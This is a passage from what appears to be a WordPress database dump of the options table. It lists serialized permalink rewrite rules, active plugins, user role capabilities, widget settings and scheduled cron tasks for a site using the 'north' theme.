index.php?services=$matches[1]&page=$matches[2]\";s:30:\"team/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"team/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"team/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"team/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"team/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"team/.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:19:\"team/(.+?)/embed/?$\";s:37:\"index.php?team=$matches[1]&embed=true\";s:23:\"team/(.+?)/trackback/?$\";s:31:\"index.php?team=$matches[1]&tb=1\";s:31:\"team/(.+?)/page/?([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&paged=$matches[2]\";s:38:\"team/(.+?)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&cpage=$matches[2]\";s:27:\"team/(.+?)(?:/([0-9]+))?/?$\";s:43:\"index.php?team=$matches[1]&page=$matches[2]\";s:38:\"testimonials/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"testimonials/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"testimonials/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"testimonials/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"testimonials/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"testimonials/.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"testimonials/(.+?)/embed/?$\";s:45:\"index.php?testimonials=$matches[1]&embed=true\";s:31:\"testimonials/(.+?)/trackback/?$\";s:39:\"index.php?testimonials=$matches[1]&tb=1\";s:39:\"testimonials/(.+?)/page/?([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&paged=$matches[2]\";s:46:\"testimonials/(.+?)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&cpage=$matches[2]\";s:35:\"testimonials/(.+?)(?:/([0-9]+))?/?$\";s:51:\"index.php?testimonials=$matches[1]&page=$matches[2]\";s:38:\"mc4wp-form/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"mc4wp-form/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"mc4wp-form/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"mc4wp-form/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"mc4wp-form/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"mc4wp-form/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"mc4wp-form/([^/]+)/embed/?$\";s:43:\"index.php?mc4wp-form=$matches[1]&embed=true\";s:31:\"mc4wp-form/([^/]+)/trackback/?$\";s:37:\"index.php?mc4wp-form=$matches[1]&tb=1\";s:39:\"mc4wp-form/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?mc4wp-form=$matches[1]&paged=$matches[2]\";s:46:\"mc4wp-form/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?mc4wp-form=$matches[1]&cpage=$matches[2]\";s:35:\"mc4wp-form/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?mc4wp-form=$matches[1]&page=$matches[2]\";s:27:\"mc4wp-form/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"mc4wp-form/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"mc4wp-form/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"mc4wp-form/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"mc4wp-form/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"mc4wp-form/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=623&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:11:{i:0;s:36:\"contact-form-7/wp-contact-form-7.php\";i:1;s:27:\"js_composer/js_composer.php\";i:2;s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";i:3;s:25:\"north-core/north-core.php\";i:4;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:5;s:23:\"revslider/revslider.php\";i:6;s:25:\"templatera/templatera.php\";i:7;s:46:\"under-construction-page/under-construction.php\";i:8;s:53:\"widget-importer-exporter/widget-importer-exporter.php\";i:9;s:24:\"wpforms-lite/wpforms.php\";i:10;s:9:\"monit.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','north','yes'),(41,'stylesheet','north','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','49752','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:2;a:4:{s:5:\"title\";s:15:\"About This Site\";s:4:\"text\";s:85:\"This may be a good place to introduce yourself and your site or include some credits.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:1:{s:46:\"under-construction-page/under-construction.php\";a:2:{i:0;s:3:\"UCP\";i:1;s:9:\"uninstall\";}}','no'),(80,'timezone_string','','yes'),(81,'page_for_posts','9','yes'),(82,'page_on_front','623','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','2131','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1619439703','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'initial_db_version','48748','yes'),(96,'wpii_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(97,'fresh_site','0','yes'),(98,'widget_search','a:3:{i:2;a:1:{s:5:\"title\";s:0:\"\";}i:3;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_recent-posts','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}i:3;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(103,'sidebars_widgets','a:9:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:15:\"default_sidebar\";a:0:{}s:8:\"archives\";a:0:{}s:7:\"footer1\";a:1:{i:0;s:6:\"text-2\";}s:7:\"footer2\";a:1:{i:0;s:8:\"search-3\";}s:7:\"footer3\";a:1:{i:0;s:14:\"recent-posts-3\";}s:7:\"footer4\";a:1:{i:0;s:10:\"nav_menu-2\";}s:13:\"new-sidebar-1\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(255,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','yes'),(104,'cron','a:9:{i:1618784717;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1618788104;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1618791703;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1618834903;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618834988;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618834989;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618840800;a:1:{s:28:\"wpforms_email_summaries_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:30:\"wpforms_email_summaries_weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1619094103;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(105,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_nav_menu','a:2:{i:2;a:1:{s:8:\"nav_menu\";i:4;}s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'recovery_keys','a:0:{}','yes'),(116,'theme_mods_twentytwenty','a:5:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:3:{s:7:\"primary\";i:2;s:8:\"expanded\";i:3;s:6:\"social\";i:4;}s:11:\"custom_logo\";i:12;s:11:\"retina_logo\";b:1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1603891437;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:1:{i:0;s:6:\"text-3\";}}}}','yes'),(7699,'mc4wp_default_form_id','2115','yes'),(129,'boldgrid_settings','a:2:{s:7:\